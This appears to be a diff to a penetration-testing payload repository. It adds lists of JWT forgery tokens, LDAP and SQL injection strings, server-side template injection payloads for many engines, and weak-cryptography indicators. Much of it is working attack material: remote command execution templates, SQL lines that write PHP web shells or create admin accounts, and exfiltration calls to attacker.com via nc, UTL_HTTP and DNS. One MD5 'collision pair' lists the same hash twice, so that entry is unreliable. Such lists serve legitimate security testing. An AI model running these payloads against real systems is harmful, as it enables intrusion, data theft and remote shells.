# Payload: No exp field
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"exp":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
# JWK Header Injection
# Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
# Kid Parameter Injection
# Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
# SQL Injection in Claims
# Payload: {"username":"admin' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
# Payload: {"user":"admin'--"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
# XSS in Claims
# Payload: {"name":"<script>alert(1)</script>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
# Payload: {"comment":"<img src=x onerror=alert(1)>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Invalid Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
# JKU Header Injection (JWK Set URL)
# Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
# X5U Header Injection (X.509 URL)
# Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
# X5C Header Injection (X.509 Certificate Chain)
# Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
# Critical Header Parameter Bypass
# Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
# Type Confusion
# Header: {"alg":"HS256","typ":"JWE"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
# Null Byte Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
# Command Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
# Path Traversal in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
# SQL Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
# Audience Manipulation
# Payload: {"aud":"admin-api"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
# Payload: {"aud":["admin","user","guest"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
# Issuer Manipulation
# Payload: {"iss":"trusted-issuer"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
# Not Before (nbf) Bypass
# Payload: {"nbf":0}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
# JWT ID (jti) Manipulation
# Payload: {"jti":"admin-token-123"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
# Scope Escalation
# Payload: {"scope":"admin read write delete"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
# Custom Claims Injection
# Payload: {"custom_role":"superadmin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
# Payload: {"groups":["admin","developers","security"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
# Numeric Value Manipulation
# Payload: {"level":999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
# Payload: {"credit":999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
# Boolean Manipulation
# Payload: {"verified":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
# Payload: {"premium":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
# Array Injection
# Payload: {"roles":["admin","superuser","root"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
# Null Value Injection
# Payload: {"userId":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
# Negative Values
# Payload: {"userId":-1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
# Large Numbers
# Payload: {"userId":2147483647}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
# Unicode Injection
# Payload: {"user":"admin\u0000"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
# Base64 URL Encoding Issues
# Missing padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Extra padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
# Standard base64 instead of base64url
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
# JWT Confusion with Session Tokens
# Use JWT where session token expected
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Empty JWT
..
# Malformed JWT
malformed.jwt.token
header.payload
.payload.signature
header..signature
# JWT in URL
https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# JWT in Cookie
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Multiple JWTs
Authorization: Bearer jwt1, Bearer jwt2
# JWT with extra segments
header.payload.signature.extra
# Case-sensitive Algorithm
# Header: {"alg":"hs256","typ":"JWT"}
eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
# Header: {"alg":"Hs256","typ":"JWT"}
eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
LDAP-Injection/ldap-injection-payloads.txt
+101
View File
@@ -37,3 +37,104 @@ mail=*
# Attribute extraction
*)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=*
# Extended filter injection
*)(|(objectClass=*))
*))%00
%28%29
%26
%7C
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
# Advanced authentication bypass
*)(&(objectClass=*))
*))%00(cn=administrator
admin*)((|userpassword=*)
admin*)((|mail=*))
*)((|(cn=*))
*)(uid=*))(&(uid=*))
# Privilege escalation attempts
*)(userAccountControl:1.2.840.113556.1.4.803:=512)
*)(adminCount=1)
*)(memberOf=CN=Domain Admins*)
*)(memberOf=*)
# Time-based blind LDAP injection
*)(cn=admin))(|(cn=*
*)(cn=a*)(|(cn=*
*)(cn=ab*)(|(cn=*
*)(cn=abc*)(|(cn=*
# Special characters and encoding
%2a
%28
%29
%26
%7c
*%00
%00*
*%20
%20*
# DN injection
cn=*,ou=*,dc=*
cn=admin,ou=*,dc=*
cn=*,ou=users,dc=*
# Multi-attribute injection
(&(uid=admin)(userPassword=*))
(&(cn=admin)(mail=*))
(&(objectClass=person)(uid=*))
(|(&(uid=admin)(userPassword=*))(uid=backup))
# Error-based injection
()
(&)
(|)
(!)
(&(uid=admin)(!(cn=*)))
# Filter chain attacks
*))(|(objectClass=*
*))(|(mail=*
*))(|(userPassword=*
# Attribute enumeration
(uid=*)
(cn=*)
(sn=*)
(mail=*)
(telephoneNumber=*)
(userPassword=*)
(description=*)
# Nested filter injection
(&(uid=admin)(&(cn=*)))
(|(&(uid=admin)(cn=*))(uid=test))
(&(objectClass=person)(|(uid=admin)(uid=root)))
# Comment injection
*);#
*);--
*)//
# Group enumeration
(memberOf=cn=admins*)
(memberOf=cn=users*)
(memberOf=*)
# Substring search
(cn=adm*)
(cn=*admin)
(cn=*admin*)
(uid=a*)
(mail=*@admin.com)
# Range queries
(uidNumber>=1000)
(uidNumber<=5000)
(createTimestamp>=20200101000000Z)
SQL-Injection/sql-injection-payloads.txt
+194
View File
@@ -84,3 +84,197 @@ admin'/*
{"$where": "sleep(5000)"}
' || '1'=='1
admin' || 'a'=='a
# Advanced time-based blind SQL injection
# MySQL advanced
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT SLEEP(5) FROM information_schema.tables LIMIT 1)--
' UNION SELECT IF(1=1,SLEEP(5),0)--
' AND IF(1=1,SLEEP(5),0)--
' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
# PostgreSQL advanced
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT pg_sleep(5) WHERE 1=1--
' AND 1=(SELECT COUNT(*) FROM generate_series(1,1000000))--
# MSSQL advanced
'; IF (1=1) WAITFOR DELAY '0:0:5'--
'; IF (SELECT USER) = 'sa' WAITFOR DELAY '0:0:10'--
' AND (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)>0--
# Oracle advanced
' AND 1=(SELECT COUNT(*) FROM all_users t1,all_users t2,all_users t3)--
' AND (SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual) IS NOT NULL--
' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM dual) IS NULL--
# WAF/Filter bypass techniques
# Space bypass
' OR '1'='1'--
'OR'1'='1'--
'OR'1'='1
'%09OR%091=1-- # Tab
'%0AOR%0A1=1-- # New line
'%0DOR%0D1=1-- # Carriage return
'/**/OR/**/1=1--
# Comment bypass
'/*!OR*/1=1--
'/*! OR */1=1--
'/*!50000OR*/1=1--
'/*!12345OR*/1=1--
# Case variation bypass
' Or '1'='1'--
' oR '1'='1'--
' OR '1'='1'--
' UnIoN SeLeCt--
# Alternative operators
' || '1'='1'--
' && 1=1--
' | 1=1--
' & 1=1--
# Encoding bypass
%27%20OR%201=1--
%27%20%4F%52%20%31%3D%31--
' %4F%52 1=1--
\' OR 1=1--
%5C%27 OR 1=1--
# String concatenation bypass
# MySQL
'||' (SELECT 'x')='x
' OR CONCAT('a','a')='aa'--
# MSSQL
' OR 'a'+'a'='aa'--
' OR 'a'||'a'='aa'--
# Oracle
' OR 'a'||'a'='aa'--
' OR CONCAT('a','a')='aa'--
# PostgreSQL
' OR 'a'||'a'='aa'--
# Obfuscation techniques
' OR 1=1%00--
' OR 1=1%20--
' OR 1=1;%00
' OR 1=1;%20
' OR 1=1/*foo*/--
' OR 1=1#%0A
# Hex encoding
0x61646D696E # admin
0x27206F72202731273D2731 # ' or '1'='1
# Char function
CHAR(39) OR CHAR(49)=CHAR(49) # ' OR '1'='1
' OR CHR(49)=CHR(49)-- # Oracle/PostgreSQL
' OR ASCII(49)=49--
# Advanced UNION attacks
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT username,password FROM users--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),database(),version()--
# Out-of-band exploitation
# DNS exfiltration (MySQL)
' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT @@version),'.attacker.com\\a')))--
# Oracle UTL_HTTP
' AND (SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual)--
# MSSQL xp_dirtree
'; EXEC master..xp_dirtree '\\attacker.com\a'--
# Error-based data extraction
# MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT @@version)))--
' AND UPDATEXML(1,CONCAT(0x5c,(SELECT @@version)),1)--
# MSSQL
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--
# PostgreSQL
' AND 1=CAST((SELECT version()) AS numeric)--
# Oracle
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
# Second-order SQL injection
username: admin'--
password: anything
# JSON-based SQL injection
{"username":"admin' OR '1'='1","password":"x"}
{"id":"1' UNION SELECT NULL--"}
# XML-based SQL injection
<user><name>admin' OR '1'='1</name></user>
# LDAP + SQL combined
*)(uid=*))(&(uid=admin' OR '1'='1
# Cookie-based SQL injection
Cookie: id=1' OR '1'='1--
# HTTP Header injection
User-Agent: ' OR '1'='1--
Referer: ' OR '1'='1--
X-Forwarded-For: ' OR '1'='1--
# Routed SQL injection (through application)
/?search=x' AND (SELECT * FROM users WHERE username='admin')--
# Advanced boolean-based blind
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>100--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin')>5--
# Bitwise operations
' AND (SELECT @@version)&1--
' AND (SELECT 1)^1=0--
# String functions exploitation
' AND (SELECT REVERSE('olleh'))='hello'--
' AND (SELECT REPLACE('test','t','x'))='xesx'--
' AND (SELECT SUBSTRING('hello',1,1))='h'--
# Database enumeration
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
' UNION SELECT table_name,table_schema FROM information_schema.tables--
' UNION SELECT column_name,table_name FROM information_schema.columns--
# Privilege escalation attempts
'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%'--
'; ALTER USER 'root'@'localhost' IDENTIFIED BY 'hacked'--
'; CREATE USER attacker IDENTIFIED BY 'pass123'--
# File operations
# MySQL
' UNION SELECT LOAD_FILE('/etc/passwd')--
' INTO OUTFILE '/var/www/html/shell.php'--
' INTO DUMPFILE '/var/www/html/shell.php'--
# PostgreSQL
'; COPY (SELECT '') TO '/tmp/output.txt'--
# MSSQL
'; EXEC xp_cmdshell 'dir'--
'; EXEC sp_configure 'xp_cmdshell',1--
# Conditional responses
' AND IF(1=1,1,(SELECT 1 UNION SELECT 2))--
' AND CASE WHEN (1=1) THEN 1 ELSE 0 END--
# Mass assignment attacks via SQL
' UPDATE users SET role='admin' WHERE username='attacker'--
' INSERT INTO users (username,role) VALUES ('attacker','admin')--
SSTI/README.md
+37
View File
@@ -0,0 +1,37 @@
# Server-Side Template Injection (SSTI)
## Description
Server-Side Template Injection occurs when user input is embedded in a template in an unsafe manner, allowing attackers to inject template directives and execute arbitrary code on the server. SSTI can lead to remote code execution, information disclosure, and complete server compromise.
## Common Vulnerable Template Engines
- **Jinja2** (Python - Flask, Django)
- **Twig** (PHP)
- **Freemarker** (Java)
- **Velocity** (Java)
- **Smarty** (PHP)
- **Pug/Jade** (Node.js)
- **ERB** (Ruby on Rails)
- **Thymeleaf** (Java)
## Common Attack Vectors
- User input in template rendering
- Email templates with user-controlled content
- Error messages with dynamic content
- Markdown/Wiki renderers
- PDF generators
- Report generators
## Testing Approach
1. Inject template syntax like `{{7*7}}` or `${7*7}` in input fields
2. Observe if mathematical expressions are evaluated
3. Identify the template engine through error messages or syntax
4. Escalate to code execution using engine-specific payloads
## Detection Methods
- Submit polyglot payloads: `${{<%[%'"}}%\`
- Test mathematical operations: `{{7*7}}`, `${7*7}`
- Check for template-specific syntax errors
- Analyze response differences
## Payloads
See `ssti-payloads.txt` for a comprehensive list of SSTI payloads.
SSTI/ssti-payloads.txt
+310
View File
@@ -0,0 +1,310 @@
# Server-Side Template Injection (SSTI) Payloads
# Detection/Polyglot payloads
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
# Jinja2 (Python - Flask)
# Basic detection
{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
# Information disclosure
{{config.items()}}
{{self.__dict__}}
{{request.environ}}
{{request.application.__globals__}}
# File read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
# Remote code execution
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('whoami').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('ls').read()}}
{{lipsum.__globals__['os'].popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
# Jinja2 sandbox escape
{{''.__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
# Twig (PHP)
# Basic detection
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
# Information disclosure
{{_self.env.getGlobals()}}
{{_self.env}}
{{dump(_context)}}
# Remote code execution
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|map('passthru')|join}}
{{['whoami']|map('system')|join}}
{{'a'.toUpperCase()}}
{{1*1}}{{6*6}}
# Freemarker (Java)
# Basic detection
${7*7}
#{7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
# Remote code execution
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
${"freemarker.template.utility.Execute"?new()("id")}
# Information disclosure
${.data_model}
${.globals}
${.main}
${.namespace}
${.current_namespace}
${.vars}
# Velocity (Java)
# Basic detection
#set($x=7*7)$x
${{7*7}}
# Remote code execution
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
#set($null=$ex.waitFor())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
# Smarty (PHP)
# Basic detection
{$smarty.version}
{php}echo `id`;{/php}
{7*7}
# Remote code execution
{system('ls')}
{system('cat /etc/passwd')}
{php}system('id');{/php}
{php}phpinfo();{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
# Information disclosure
{$smarty.template}
{$smarty.current_dir}
{$smarty.template_dir}
# Pug/Jade (Node.js)
# Basic detection
#{7*7}
!{7*7}
# Remote code execution
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
#{global.process.mainModule.require('child_process').exec('id')}
#{global.process.mainModule.require('child_process').execSync('id').toString()}
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.com 8080')
# ERB (Ruby on Rails)
# Basic detection
<%= 7*7 %>
<%= system('whoami') %>
# Remote code execution
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').readlines() %>
<%= require 'open3' %><%= Open3.capture2("id")[0] %>
<%= File.open('/etc/passwd').read %>
# Thymeleaf (Java)
# Basic detection
[[${7*7}]]
[(${7*7})]
[# th:block th:each="i : ${#numbers.sequence(1, 7*7)}" /]
# Remote code execution (with SpringEL)
${T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
# Tornado (Python)
# Basic detection
{{7*7}}
{% import os %}{{os.popen("id").read()}}
# Remote code execution
{% import subprocess %}{{subprocess.check_output('id',shell=True)}}
{% import os %}{{os.system('whoami')}}
# Mako (Python)
# Basic detection
${7*7}
<%={{7*7}%>
# Remote code execution
<%import os%>${os.popen("id").read()}
${__import__('os').popen('id').read()}
# Django (Python)
# Basic detection
{{7*7}}
{% debug %}
# Limited RCE (usually sandboxed)
{{request.META}}
{{settings.SECRET_KEY}}
# Handlebars (Node.js)
# Basic detection
{{7*7}}
{{this}}
# Prototype pollution
{{#with "constructor"}}{{#with split as |a|}}{{pop (push "alert('XSS')")}}{{#with .}}{{#with (concat (lookup join (slice 0 1)))}}{{#each .}}{{#with (string.sub.call ../sub "constructor")}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
# Groovy (Java)
# Basic detection
${7*7}
<%= 7*7 %>
# Remote code execution
${"".getClass().forName("java.lang.Runtime").getRuntime().exec("calc")}
# Dot (JavaScript)
# Basic detection
{{=7*7}}
# Remote code execution
{{= global.process.mainModule.require('child_process').execSync('id').toString() }}
# Nunjucks (JavaScript)
# Basic detection
{{7*7}}
{{foo}}
# Remote code execution
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
# Razor (.NET)
# Basic detection
@(7*7)
@{7*7}
# Information disclosure
@System.Diagnostics.Process.GetCurrentProcess().Id
@Directory.GetFiles("C:\\")
# EJS (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%=global.process.mainModule.require('child_process').execSync('id')%>
# Underscore/Lodash templates (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%= _.template('test')() %>
# Marko (JavaScript)
# Basic detection
${7*7}
# Remote code execution
${console.log(global.process.mainModule.require('child_process').execSync('id').toString())}
# Plate (Rust)
# Basic detection
{{7*7}}
# Liquid (Ruby)
# Basic detection
{{7 | times: 7}}
# Scalate (Scala)
# Basic detection
${7*7}
<%=7*7%>
# Template.js
# Basic detection
{{7*7}}
# Trim (Java)
# Basic detection
${7*7}
# Jade/Pug continued (with more variants)
- var x = global.process.mainModule.require
!{x('child_process').execSync('cat /etc/passwd')}
# ColdFusion
# Basic detection
#7*7#
# ASP.NET Web Forms
# Basic detection
<%= 7*7 %>
# Expression Language (Java EE)
# Basic detection
${7*7}
#{7*7}
# Remote code execution
${pageContext.request.getSession().setAttribute("shell","".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(request.getParameter("cmd")))}
# Generic testing payloads
{{self}}
${self}
<%= self %>
#{self}
*{self}
@{self}
{{constructor}}
{{__class__}}
{{__init__}}
{{__globals__}}
{{__import__}}
# Blind SSTI detection
a{{9999*9999}}b
a${9999*9999}b
a<%= 9999*9999 %>b
Weak-Cryptography/weak-crypto-payloads.txt
+205
View File
@@ -21,3 +21,208 @@ AKIA[0-9A-Z]{16} # AWS Access Key pattern
[0-9a-zA-Z]{32} # Generic 32-char key
ghp_[0-9a-zA-Z]{36} # GitHub Personal Access Token pattern
sk_live_[0-9a-zA-Z]{24} # Stripe Live Secret Key pattern
# Weak encryption algorithms
# DES (Data Encryption Standard) - 56-bit key
DES
DES-CBC
DES-ECB
DES-EDE
DES-EDE-CBC
# 3DES with weak keys
3DES
DES-EDE3
DES-EDE3-CBC
# RC4 (Rivest Cipher 4)
RC4
RC4-40
RC4-128
ARCFOUR
# RC2
RC2
RC2-40-CBC
RC2-64-CBC
RC2-CBC
# MD5 hash algorithm (broken)
MD5
MD5-SHA1
# SHA1 hash algorithm (weak)
SHA1
SHA-1
# Weak RSA key sizes
RSA-512
RSA-768
RSA-1024
# ECB mode (Electronic Codebook) - deterministic
AES-128-ECB
AES-192-ECB
AES-256-ECB
# Weak padding schemes
PKCS1-v1_5
PKCS#1 v1.5
# Null encryption
NULL
eNULL
NULL-MD5
NULL-SHA
# Export grade ciphers
EXP-DES-CBC-SHA
EXP-RC2-CBC-MD5
EXP-RC4-MD5
# Anonymous key exchange (no authentication)
AECDH
ADH
aNULL
# Weak Diffie-Hellman
DH-512
DH-1024
# CBC with weak MAC (BEAST/POODLE vulnerable)
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
# SSL/TLS version issues
SSLv2
SSLv3
TLSv1.0
TLSv1.1
# Weak cipher suites
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_DES_CBC_SHA
TLS_DH_anon_WITH_AES_128_CBC_SHA
# XOR cipher (trivial)
XOR
# Caesar cipher
ROT13
ROT47
# Vigenere cipher patterns
VIGENERE
# Insecure random number generators
# Predictable seeds
PRNG with time() seed
Math.random()
rand()
srand(time())
# Weak key derivation functions
PBKDF1
MD5-based KDF
SHA1-based KDF
# Hardcoded encryption keys (testing patterns)
key=00000000000000000000000000000000
key=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
key=12345678901234567890123456789012
secretkey=admin
encryptionKey=password
# Weak initialization vectors
IV=00000000000000000000000000000000
IV=11111111111111111111111111111111
Fixed IV
Reused IV
# Predictable salts
salt=salt
salt=123456
salt=""
No salt
# Hash collision examples
# MD5 collisions
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 1
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 2
# Timing attack vulnerabilities
String comparison without constant time
strcmp() without timing safety
# Padding oracle indicators
PaddingException
Invalid padding
Bad padding
# ECB detection patterns (identical blocks)
Block1: 0123456789ABCDEF
Block2: 0123456789ABCDEF
# Weak HMAC
HMAC-MD5
HMAC-SHA1
# CRC (not cryptographic)
CRC32
CRC16
ADLER32
# Length extension attacks
SHA-256 without HMAC
SHA-512 without HMAC
# Insecure modes of operation
CTR without authentication
CBC without HMAC
OFB mode
# Bit flipping attack vectors
CBC mode tampering
CFB mode tampering
# Known weak parameters
p=2 # Weak prime
g=1 # Weak generator
e=3 # Weak RSA exponent
# Textbook RSA (no padding)
RSA without OAEP
RSA without PSS
# Weak digital signatures
DSA with k reuse
ECDSA with k reuse
DSA-SHA1
# Certificate issues
Self-signed certificates
Expired certificates
MD5 certificate signature
SHA1 certificate signature
# Java Cipher strings (weak)
AES/ECB/NoPadding
AES/ECB/PKCS5Padding
DES/ECB/PKCS5Padding
